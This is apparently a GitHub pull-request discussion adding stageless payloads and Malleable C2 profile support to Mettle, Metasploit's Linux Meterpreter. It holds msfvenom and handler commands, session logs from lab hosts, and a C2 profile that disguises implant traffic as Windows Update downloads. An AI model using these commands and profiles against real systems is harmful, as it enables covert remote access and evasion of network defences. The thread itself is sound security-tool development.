Stageless Mettle with Malleable C2 profile support by OJ · Pull Request #294 · rapid7/mettle

OJ · 2026-05-20T12:21:54Z

This PR modifies Mettle so that it supports the following:

The new TLV-based configuration block.
Stageless payloads, which for Mettle isn't super helpful yet.
Transport commands.
Malleable C2 support.

This code relies on the changes that are part of the Metasploit Framework PR. Discussion and more details can be found over there.

I'm PR'ing against main, but should probably be part of the 6.5 release.

Replace the CLI-argument-only configuration path with a TLV config block that the framework patches into the binary at generation time. This brings mettle in line with the Windows, Python, Java, and PHP Meterpreter implementations that all use Rex::Payloads::Meterpreter::Config. - Add C2 TLV constants (700-725 series) to tlv_types.h - Add 8KB CONFIG_BLOCK placeholder in main.c with signature-based patching, checked before CLI args and injection detection at startup - Add tlv_packet_from_raw() to tlv.c for wrapping GROUP TLV children - Parse UUID, session GUID, session expiry, debug log, and C2 transport groups from the config packet - Add c2_transport_config and c2_verb_config structs to c2.h - Add c2_add_transport_uri_config() to attach parsed config to transports - Parse C2 GET/POST profile sub-groups including URI, encoding flags, prefix/suffix, prefix/suffix skip, and UUID placement options - Implement profile-aware HTTP transport: per-verb URL building, Base64/Base64URL encode/decode, prefix/suffix wrapping on egress, prefix/suffix stripping and decoding on ingress, UUID in query param/header/cookie - Apply TLV transport config (UA, custom headers) during HTTP transport init alongside legacy pipe-separated URI args - Update mettle.rb to patch CONFIG_BLOCK into binaries - Fix json-c calloc argument order for modern GCC The legacy DEFAULT_OPTS CLI path is preserved as a fallback.

dledda-r7

Did the first iteration here, i will start playing with mettle and also give you some datapoint regarding other architectures

dledda-r7 · 2026-06-08T09:19:55Z

Resolved

Hello @OJ, I started the testing and I don't get back any session. I tried both with a profile and no profile.

No Profile set

Datastore Options

msf payload(linux/x64/meterpreter_reverse_http) > show options

Module options (payload/linux/x64/meterpreter_reverse_http):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   EXTENSIONS                    no        Comma-separate list of extensions to load
   LHOST        192.168.3.10     yes       The local listener hostname
   LPORT        8080             yes       The local listener port
   LURI                          no        The HTTP Path
   MALLEABLEC2                   no        Path to a file containing the malleable C2 profile


View the full module info with the info, or info -d command.

msf payload(linux/x64/meterpreter_reverse_http) > 

Module advanced options (payload/linux/x64/meterpreter_reverse_http):

   Name                         Current Setting                  Required  Description
   ----                         ---------------                  --------  -----------
   AutoLoadStdapi               true                             yes       Automatically load the Stdapi extension
   AutoRunScript                                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true                             yes       Automatically capture system information on initializati
                                                                           on.
   AutoUnhookProcess            false                            yes       Automatically load the unhook extension and unhook the p
                                                                           rocess
   AutoVerifySessionTimeout     30                               no        Timeout period to wait for session validation to occur,
                                                                           in seconds
   EnableUnicodeEncoding        false                            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                                no        Path to a SSL certificate in unified PEM format, ignored
                                                                            for HTTP transports
   HttpServerName               Apache                           no        The server header that the handler will send in response
                                                                            to requests
   HttpUnknownRequestResponse   <html><body><h1>It works!</h1><  no        The returned HTML response body when the handler receive
                                /body></html>                              s a request that is not from a payload
   HttpUserAgent                Mozilla/5.0 (Windows NT 10.0; W  no        The user-agent that the payload should use for communica
                                in64; x64; rv:133.0) Gecko/2010            tion
                                0101 Firefox/133.0
   IgnoreUnknownPayloads        false                            no        Whether to drop connections from payloads using unknown
                                                                           UUIDs
   InitialAutoRunScript                                          no        An initial script to run on session creation (before Aut
                                                                           oRunScript)
   MeterpreterDebugBuild        true                             no        Use a debug version of Meterpreter
   MeterpreterDebugLogging                                       no        The Meterpreter debug logging configuration, see https:/
                                                                           /docs.metasploit.com/docs/using-metasploit/advanced/mete
                                                                           rpreter/meterpreter-debugging-meterpreter-sessions.html
   MeterpreterTryToFork         false                            no        Fork a new process if the functionality is available
   OverrideLHOST                                                 no        When OverrideRequestHost is set, use this value as the h
                                                                           ost name for secondary requests
   OverrideLPORT                                                 no        When OverrideRequestHost is set, use this value as the p
                                                                           ort number for secondary requests
   OverrideRequestHost          false                            no        Forces a specific host and port instead of using what th
                                                                           e client requests, defaults to LHOST:LPORT
   OverrideScheme                                                no        When OverrideRequestHost is set, use this value as the s
                                                                           cheme for secondary requests, e.g http or https
   PayloadProcessCommandLine                                     no        The displayed command line that will be used by the payl
                                                                           oad
   PayloadUUIDName                                               no        A human-friendly name to reference this unique payload (
                                                                           requires tracking)
   PayloadUUIDRaw                                                no        A hex string representing the raw 8-byte PUID value for
                                                                           the UUID
   PayloadUUIDSeed                                               no        A string to use when generating the payload UUID (determ
                                                                           inistic)
   PayloadUUIDTracking          false                            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                                yes       How many additional successful pingbacks
   PingbackSleep                30                               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false                            yes       Allow reverse tcp even with Proxies specified. Connect b
                                                                           ack will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                                       no        The port to bind to on the local system if different fro
                                                                           m LPORT
   ReverseListenerComm                                           no        The specific communication channel to use for this liste
                                                                           ner
   SessionCommunicationTimeout  300                              no        The number of seconds of no activity before this session
                                                                            should be killed
   SessionExpirationTimeout     604800                           no        The number of seconds before this session should be forc
                                                                           ibly shut down
   SessionRetryTotal            3600                             no        Number of seconds try reconnecting for on network failur
                                                                           e
   SessionRetryWait             10                               no        Number of seconds to wait between reconnect attempts
   VERBOSE                      false                            no        Enable detailed status messages
   WORKSPACE                                                     no        Specify the workspace for this module


View the full module info with the info, or info -d command.

msf payload(linux/x64/meterpreter_reverse_http) >

Metasploit Output

msf payload(linux/x64/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Redirecting stageless: URI '/bW2GuVWjiFgfeBl6dV6XgAD38VXBNhinu0uGumeuPF72Du7Gf3w7ZYW43gi3aN975ZvAlRoL09PrHjogoauoHWv4o-J2REBAC_XpIuCKegp/' with UA '' -> UUID bW2GuVWjiFgfeBl6dV6WcQ2wY1ugWW9GmMVtO676M95I2MieBlLlSQT24GXDvFlYRZWJ_3vcakDDArOo93hp8uhKKL
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Redirecting stageless: URI '/bW2GuVWjiFgfeBl6dV6XgAD38VXBNhinu0uGumeuPF72Du7Gf3w7ZYW43gi3aN975ZvAlRoL09PrHjogoauoHWv4o-J2REBAC_XpIuCKegp/' with UA '' -> UUID bW2GuVWjiFgfeBl6dV6WcgEdhOH2GynKvgzmwVkzSXvl3qNQ2PRYuA7QWN0mYo2M-CYxZAm_wlXgImd11QTY_Pu3MIEnPmB1ymHe-ueCeVUDHQL-4ovFh4GTzZ
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Redirecting stageless: URI '/bW2GuVWjiFgfeBl6dV6XgAD38VXBNhinu0uGumeuPF72Du7Gf3w7ZYW43gi3aN975ZvAlRoL09PrHjogoauoHWv4o-J2REBAC_XpIuCKegp/' with UA '' -> UUID bW2GuVWjiFgfeBl6dV6WcgHsDYxPon2SpaFxZe9gxsMMtEvDd4t_SMsWPlqDBPbQeMbB2MEzuYKFkmDLGESKqfa9uGTKdcaKxP1_qaUBGGETtXO-3dZUQ4dfR
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Redirecting stageless: URI '/bW2GuVWjiFgfeBl6dV6XgAD38VXBNhinu0uGumeuPF72Du7Gf3w7ZYW43gi3aN975ZvAlRoL09PrHjogoauoHWv4o-J2REBAC_XpIuCKegp/' with UA '' -> UUID bW2GuVWjiFgfeBl6dV6WcgxQVBNl1EzBH-8d4WXkC5C2vGE5Y0ONmnG_7GTCxWUafxx9B56oz4d
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Redirecting stageless: URI '/bW2GuVWjiFgfeBl6dV6XgAD38VXBNhinu0uGumeuPF72Du7Gf3w7ZYW43gi3aN975ZvAlRoL09PrHjogoauoHWv4o-J2REBAC_XpIuCKegp/' with UA '' -> UUID bW2GuVWjiFgfeBl6dV6WcghufpNvpQW_0E53Kheo9PUry5p0Sm4CHlPcYsU3xTiIKD-tzHC99GQqTHSheVfyFrD1kBdutM0-ArmK9CCGGoZ4GZkzZTybZEGR
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Redirecting stageless: URI '/bW2GuVWjiFgfeBl6dV6XgAD38VXBNhinu0uGumeuPF72Du7Gf3w7ZYW43gi3aN975ZvAlRoL09PrHjogoauoHWv4o-J2REBAC_XpIuCKegp/' with UA '' -> UUID bW2GuVWjiFgfeBl6dV6WcgifmpOVKiwRd3bNrM3bWz1Jw001hvDHOMO0_colga3b85vZowzSCknjMnWdd9h5GpKMbveNQY-ew7vMNQpjzT3mHh6glE
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Redirecting stageless: URI '/bW2GuVWjiFgfeBl6dV6XgAD38VXBNhinu0uGumeuPF72Du7Gf3w7ZYW43gi3aN975ZvAlRoL09PrHjogoauoHWv4o-J2REBAC_XpIuCKegp/' with UA '' -> UUID bW2GuVWjiFgfeBl6dV6WcgmDbidKQA-qb8Ya4e3HtS2vWkcw
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Redirecting stageless: URI '/bW2GuVWjiFgfeBl6dV6XgAD38VXBNhinu0uGumeuPF72Du7Gf3w7ZYW43gi3aN975ZvAlRoL09PrHjogoauoHWv4o-J2REBAC_XpIuCKegp/' with UA '' -> UUID bW2GuVWjiFgfeBl6dV6Wcgf8Il5_cNcZVwAWrdWikN_fI132nGU3KYfDmusZX5y2WP7HLsdtahnIFNn79
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Redirecting stageless: URI '/bW2GuVWjiFgfeBl6dV6XgAD38VXBNhinu0uGumeuPF72Du7Gf3w7ZYW43gi3aN975ZvAlRoL09PrHjogoauoHWv4o-J2REBAC_XpIuCKegp/' with UA '' -> UUID bW2GuVWjiFgfeBl6dV6Wcgu874ziZRDZ9WaCa4poMH0gjfpqafPtGRd_hRajQmkv3x0VZmTGFFB-HCk1I20bxsF9AEUuGf3Nb0PH3xNkIVLWKsnk69fcYQ_mLL5m
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Redirecting stageless: URI '/bW2GuVWjiFgfeBl6dV6XgAD38VXBNhinu0uGumeuPF72Du7Gf3w7ZYW43gi3aN975ZvAlRoL09PrHjogoauoHWv4o-J2REBAC_XpIuCKegp/' with UA '' -> UUID bW2GuVWjiFgfeBl6dV6Wcgf4-dSHbHZY0QJximEHFYmGv4LfEnl7
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Redirecting stageless: URI '/bW2GuVWjiFgfeBl6dV6XgAD38VXBNhinu0uGumeuPF72Du7Gf3w7ZYW43gi3aN975ZvAlRoL09PrHjogoauoHWv4o-J2REBAC_XpIuCKegp/' with UA '' -> UUID bW2GuVWjiFgfeBl6dV6WcwPL5bm2Lk_Ibzv3ySEBqcudr0x9FEHeuWbqasWI5viFd4VXmK_BbQ_UqFqfDT9JWZBjZn2uXvSQy-eItdY3L4MXF
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Redirecting stageless: URI '/bW2GuVWjiFgfeBl6dV6XgAD38VXBNhinu0uGumeuPF72Du7Gf3w7ZYW43gi3aN975ZvAlRoL09PrHjogoauoHWv4o-J2REBAC_XpIuCKegp/' with UA '' -> UUID bW2GuVWjiFgfeBl6dV6WcwYa2-aD
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Redirecting stageless: URI '/bW2GuVWjiFgfeBl6dV6XgAD38VXBNhinu0uGumeuPF72Du7Gf3w7ZYW43gi3aN975ZvAlRoL09PrHjogoauoHWv4o-J2REBAC_XpIuCKegp/' with UA '' -> UUID bW2GuVWjiFgfeBl6dV6WcwTxt4oskzGWY831LWnDMbfKu-4TPKUFjGjFd-m3s_AT786cXgq3w
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0h3s79ka) Without a database connected that payload UUID tracking will not work!
....

and continue spamming that. I remember Windows 7 was having the same result... might be some URL patching issue.

OJ · 2026-06-08T21:48:11Z

Hi @dledda-r7 ! Thank you for looking at this. Strange that you're having the issue as I was able to get sessions in each case. I'll dive into this very shortly and get back to you. Thanks again.

OJ · 2026-06-08T22:45:57Z

Just did a local test:

$ ./msfvenom -p linux/x64/meterpreter_reverse_https -f elf LHOST=127.0.0.1 LPORT=8000 MALLEABLEC2=/home/oj/code/meterpreter.profile > /tmp/mettle.bin
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
WARNING: Local file /home/oj/code/metasploit-framework/data/mettle/x86_64-linux-musl/bin/mettle is being used
WARNING: Local files may be incompatible Metasploit framework
No encoder specified, outputting raw payload
Payload size: 1134336 bytes
Final size of elf file: 1134336 bytes

Then in the other console:

$ ./msfconsole -q -x 'use multi/handler; set payload linux/x64/meterpreter_reverse_https; setg LHOST 127.0.0.1; set LPORT 8000; set MALLEABLEC2 /home/oj/code/meterpreter.profile; run'
[*] Using configured payload generic/shell_reverse_tcp
payload => linux/x64/meterpreter_reverse_https
LHOST => 127.0.0.1
LPORT => 8000
MALLEABLEC2 => /home/oj/code/meterpreter.profile
WARNING: Local file /home/oj/code/metasploit-framework/data/mettle/x86_64-linux-musl/bin/mettle is being used
WARNING: Local files may be incompatible Metasploit framework
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:8000
[!] https://127.0.0.1:8000 handling request from 127.0.0.1; (UUID: 7la0rwqd) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:8000 handling request from 127.0.0.1; (UUID: 7la0rwqd) Redirecting stageless: URI '/ucD/QXMyR0dFb2RYSVZSLWxmNE85MFVzQVBIZGlERHlKMlNaWlNYejlmby1VQWw2SXVYaGFjSVRTT3c5Zkx2dkxFdXppOElWQy1MdUxVUmxhWTUyN3VkZ1E5TWFpcDVlLV9fZzgyd1FXbS16ckhpMV9Ub04' with UA '' -> UUID As2GGEodXIVR-lf4O90Ukw69HQsU9FdnYODSB4umxlXRClNB9LFU-vcB8AuCzK2DYV0xldbLFFbHBA7gU2EZNUJS8gV-Y57lCQU3iFb
[!] https://127.0.0.1:8000 handling request from 127.0.0.1; (UUID: 7la0rwqd) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:8000 handling request from 127.0.0.1; (UUID: 7la0rwqd) Attaching orphaned/stageless session...
[!] https://127.0.0.1:8000 handling request from 127.0.0.1; (UUID: 7la0rwqd) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (127.0.0.1:8000 -> 127.0.0.1:44140) at 2026-06-09 08:42:51 +1000

meterpreter > sysinfo
Computer     : kvothe
OS           : nixos 26.05 (Linux 7.0.9-zen2)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

This seems to work fine with both http and https.

Can you please share a copy of the profile you're using? Thank you!

OJ · 2026-06-08T22:47:06Z

Oh I see you're not using one! My bad. I just fired it up without the C2 profile set, and I had the same issue. Looking into it now. Thanks!

OJ · 2026-06-08T23:00:35Z

Should be back on track now, I'll address your other points now. Thank you.

dledda-r7 · 2026-06-09T08:16:57Z

Resolved

Hi @OJ, while testing the fix for the non-profile, i also will share the profile that is making issues:

http-get {

    set uri "/c/msdownload/update/others/2016/12/29136388_";

    client {

        header "Accept" "*/*";
        header "Host" "download.windowsupdate.com";

        #session metadata
        metadata {
            base64url;
            append ".cab";
            uri-append;
        }
    }


    server {
        header "Content-Type" "application/vnd.ms-cab-compressed";
        header "Server" "Microsoft-IIS/8.5";
        header "MSRegion" "N. America";
        header "Connection" "keep-alive";
        header "X-Powered-By" "ASP.NET";

        #Beacon's tasks
        output {

            print;
        }
    }
}

http-post {

    set uri "/c/msdownload/update/others/2016/12/3215234_";
    set verb "GET";

    client {

        header "Accept" "*/*";

        #session ID
        id {
            prepend "download.windowsupdate.com/c/";
            header "Host";
        }


        #Beacon's responses
        output {
            base64url;
            append ".cab";
            uri-append;
        }
    }

    server {
        header "Content-Type" "application/vnd.ms-cab-compressed";
        header "Server" "Microsoft-IIS/8.5";
        header "MSRegion" "N. America";
        header "Connection" "keep-alive";
        header "X-Powered-By" "ASP.NET";

        #empty
        output {
            print;
        }
    }

this is the same i used for the Windows C2 test

OJ · 2026-06-09T12:07:46Z

This should be good now mate.

OJ · 2026-06-09T12:08:18Z

I added to the framework side as well, so grab that too please.

dledda-r7 · 2026-06-09T12:27:01Z

I am stil getting the same issue, will try to investigate more

OJ · 2026-06-09T12:39:43Z

Generation/exec:

$ ./msfvenom -p linux/x64/meterpreter_reverse_http -f elf LHOST=127.0.0.1 LPORT=8000 MALLEABLEC2=/home/oj/code/diego.profile > /tmp/mettle.bin
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
WARNING: Local file /home/oj/code/metasploit-framework/data/mettle/x86_64-linux-musl/bin/mettle is being used
WARNING: Local files may be incompatible Metasploit framework
No encoder specified, outputting raw payload
Payload size: 1134384 bytes
Final size of elf file: 1134384 bytes

$ /tmp/mettle.bin

Listener:

$ ./msfconsole -q -x 'use multi/handler; set payload linux/x64/meterpreter_reverse_http; setg LHOST 127.0.0.1; set LPORT 8000; set MALLEABLEC2 /home/oj/code/diego.profile; 
set exitonsession false; run -j'
payload => linux/x64/meterpreter_reverse_http
LHOST => 127.0.0.1
LPORT => 8000
MALLEABLEC2 => /home/oj/code/diego.profile
exitonsession => false
WARNING: Local file /home/oj/code/metasploit-framework/data/mettle/x86_64-linux-musl/bin/mettle is being used
WARNING: Local files may be incompatible Metasploit framework
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTP reverse handler on http://127.0.0.1:8000
msf exploit(multi/handler) > 
[!] http://127.0.0.1:8000 handling request from 127.0.0.1; (UUID: caovesbh) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:8000 handling request from 127.0.0.1; (UUID: caovesbh) Redirecting stageless: URI '/c/msdownload/update/others/2016/12/29136388_/Sm0ybDBFOUtkckp6YVhWckdVRjd0QUJ4YmtqcmlTWktjN3NvU3FXM091XzVHdkJCcEVlakxtU2R3UjBlU25zeU0tbzNlZ1p4ZnEycmluckVDT1VocVhuZDUwdjhrVGlNODVfMW5YWktl.cab' with UA '' -> UUID Jm2l0E9KdrJzaXVrGUF7jATUd10YbxAlX1nL7T3Kdj-VpBSXA4-qetwqk-1-MZMgBl8cpvLd5bYQmuQ71WJL7r9yL9-NzK
[!] http://127.0.0.1:8000 handling request from 127.0.0.1; (UUID: caovesbh) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:8000 handling request from 127.0.0.1; (UUID: caovesbh) Attaching orphaned/stageless session...
[!] http://127.0.0.1:8000 handling request from 127.0.0.1; (UUID: caovesbh) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (127.0.0.1:8000 -> 127.0.0.1:47074) at 2026-06-09 22:36:55 +1000
sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : kvothe
OS           : nixos 26.05 (Linux 7.0.9-zen2)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

This includes changes to mettle source, mettle gem/ruby, and MSF.

dledda-r7 · 2026-06-09T13:45:10Z

@OJ sorry my bad, i forgot to reinstall the gem for the .rb part... gonna check it soon. thanks for helping norrowing the issue! 🎉

w00t w00t

msf payload(linux/x64/meterpreter_reverse_http) > generate -f elf -o ~/Public/metsrv.x64.elf
[*] Writing 1138480 bytes to ~/Public/metsrv.x64.elf...                                                     
msf payload(linux/x64/meterpreter_reverse_http) >                                                           
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: ndr4zc7b) Without a database connected that payload UUID tracking will not work!                                                                
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: ndr4zc7b) Redirecting stageless: URI '/gBfN1Zsw7fV8QnpAFmpmtgE4St_Rk4y0zPed0L8VxOYysuLMIFLDoZ3y29EE3iAaKnXil4g2oiFWEPj6nz1KIbI-X8D9Hribx6HZjsSev-cDc_Q4rt' with UA '' -> UUID gBfN1Zsw7fV8QnpAFmpmtAflbxYIb
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: ndr4zc7b) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: ndr4zc7b) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: ndr4zc7b) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (192.168.3.10:8080 -> 192.168.3.10:47514) at 2026-06-09 09:54:00 -0400

msf payload(linux/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : kali
OS           : Debian  (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

gonna try with the other arches

dledda-r7 · 2026-06-09T14:17:23Z

Test Plan

Profiles Base: https://github.com/BC-SECURITY/Malleable-C2-Profiles/tree/master/Normal

X64

reverse tcp (stageless and staged)

stageless ✅

msf payload(linux/x64/meterpreter_reverse_tcp) > 
[*] Started reverse TCP handler on 192.168.3.10:4444 
[*] Meterpreter session 4 opened (192.168.3.10:4444 -> 192.168.3.10:46820) at 2026-06-09 10:19:43 -0400

msf payload(linux/x64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer     : kali
OS           : Debian  (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: kali
meterpreter >

staged ✅

reverse http (stageless) ✅

reverse https (stageless) ✅

test at least 15 profiles

amazon.profile ✅

msf payload(linux/x64/meterpreter_reverse_http) > set MALLEABLEC2 /home/kali/Documents/profiles/amazon.profile
MALLEABLEC2 => /home/kali/Documents/profiles/amazon.profile
msf payload(linux/x64/meterpreter_reverse_http) > jobs -K
Stopping all jobs...
msf payload(linux/x64/meterpreter_reverse_http) > to_handler 
[*] Payload Handler Started as Job 6
msf payload(linux/x64/meterpreter_reverse_http) > 
[*] Started HTTP reverse handler on http://192.168.3.10:8080

msf payload(linux/x64/meterpreter_reverse_http) > generate -f elf -o ~/Public/metsrv.x64.elf
[*] Writing 1138480 bytes to ~/Public/metsrv.x64.elf...
msf payload(linux/x64/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: aby4cj23) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: aby4cj23) Redirecting stageless: URI '/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books' with UA '' -> UUID PZtiyFi4rb9zNnU0GR9TXQA2Jt_UGiCkRO7LueG9z1LzKvmFc9h3U_QMZBVUI1YmMVOpkoeBbqv4unOMoYr_Db_ChAYHBhW9f85GiO_zjSwiaNDYZ
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: aby4cj23) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: aby4cj23) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: aby4cj23) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 7 opened (192.168.3.10:8080 -> 192.168.3.10:39800) at 2026-06-10 04:29:34 -0400

msf payload(linux/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 7...

meterpreter > sysinfo
Computer     : kali
OS           : Debian  (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: kali
meterpreter > bg
[*] Backgrounding session 7...
msf payload(linux/x64/meterpreter_reverse_http) > set MALLEABLEC2 
MALLEABLEC2 => /home/kali/Documents/profiles/amazon.profile
msf payload(linux/x64/meterpreter_reverse_http) >

bing_maps ✅

msf payload(linux/x64/meterpreter_reverse_http) > to_handler
[*] Payload Handler Started as Job 8
msf payload(linux/x64/meterpreter_reverse_http) > 
[*] Started HTTP reverse handler on http://192.168.3.10:8080

msf payload(linux/x64/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: amruo23z) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: amruo23z) Redirecting stageless: URI '/maps/overlaybfpr' with UA '' -> UUID BpwB8B0YxmvzJvUkmQ_SQA9nuv_2sXKqNGwHrPM9YcrxyCC_h0edlCrzzosg7nMnTk5HLGF7kMOeHiYReaZ
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: amruo23z) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: amruo23z) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: amruo23z) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 8 opened (192.168.3.10:8080 -> 192.168.3.10:36706) at 2026-06-10 04:33:45 -0400

msf payload(linux/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 8...

meterpreter > sysinfo
Computer     : kali
OS           : Debian  (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: kali
meterpreter > exit
[*] Shutting down session: 8

[*] 192.168.3.10 - Meterpreter session 8 closed.  Reason: User exit
msf payload(linux/x64/meterpreter_reverse_http) > set MALLEABLEC2 
MALLEABLEC2 => /home/kali/Documents/profiles/bing_maps.profile
msf payload(linux/x64/meterpreter_reverse_http) >

bingsearch_getonly 🔴

msf payload(linux/x64/meterpreter_reverse_http) > 
[*] Started HTTP reverse handler on http://192.168.3.10:8080

msf payload(linux/x64/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: jo4lg08a) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: jo4lg08a) Redirecting stageless: URI '/search/' with UA '' -> UUID A2OVt94e0Xu5vr-805ebOwDwDt_DjYxB
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: jo4lg08a) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: jo4lg08a) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: jo4lg08a) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 10 opened (192.168.3.10:8080 -> 192.168.3.10:56796) at 2026-06-10 04:38:32 -0400

msf payload(linux/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 10...

meterpreter > ls
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
meterpreter >

microsoft_update ✅

msf payload(linux/x64/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 57chgtuo) Without a database connected that payload UUID tracking will not work!
